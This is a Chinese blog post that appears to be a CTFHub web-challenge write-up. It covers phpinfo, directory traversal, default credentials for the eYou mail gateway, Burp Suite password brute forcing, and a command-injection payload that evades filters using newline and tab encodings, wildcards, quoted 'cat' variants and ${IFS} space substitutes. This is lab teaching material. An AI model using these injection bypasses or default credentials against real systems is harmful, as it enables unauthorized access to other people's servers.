CTFHub(web部分,phpinfo,目录遍历,默认口令,弱口令,综合过滤)

文章讲述了如何通过phpinfo进行目录遍历,发现并利用默认口令,使用弱口令爆破工具,以及通过payload和过滤方法(如通配符、分号过滤和绕过)来获取flag。内容涉及了Linux中的通配符使用和eval型攻击的防御。
摘要由CSDN通过智能技术生成

  1. Phpinfo

输入phpinfo.php即可

  1. 目录遍历

便点,每次flag的位置是随机的,

默认口令

   根据网站名称,百度搜索eyou邮件网关的默认密码,发现系统有三个默认的帐号(admin:+-ccccc、eyougw:admin@(eyou)、eyouuser:eyou_admin)最后,

eyouuser   admin_@(eyou)即可

弱口令

Bp抓包后爆破

先随意输入密码和应户名,打开bp选择Proxy进行抓包然后发送给Intruder,导入弱口令字典后进行爆破即可,为admin,CTFHub

综合过滤

由题目可知过滤管道符,flag,空格,用可以尝试用%0a(换行符),通配符,%09(回车符号),来代替

尝试后为这个

未发现,加上通配符*后

?ip=1%0Acd%09*_is_here%0Atac%09*_2530108722716.php

表示:?ip=1;cd *_is_here;tac *_2530108722716.php

得到这个界面后即可查看源代码得到flag

知识点

对于payload,有这么几种过滤方法:

  1. 过滤用分号;
  2. 过滤空格
  3. 过滤关键字cat,flag
  4. 过滤反斜杠 /

简单绕过 cat的方法

  1. /bin/c?t flag
  2. c'a't flag
  3. c''at flag
  4. c""at flag
  5. c\at flag

通配符

在Linux中
? 问号可以代替任意一个字符
* 星号可以代替多个字符

过滤flag

(1)用通配符绕过?c=system('cat f*')

  (2)复制:system("cp fla*.php 1.txt")

      执行文件:1.txt

 过滤flag,php,system(对命令执行函数进行过滤)
(以上是对于eval型,即将字符串作为php代码执行)

过滤空格

  • <
  • <>
  • %20
  • %09
  • ${IFS}
  • $IFS
  • {cat,/flag}
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值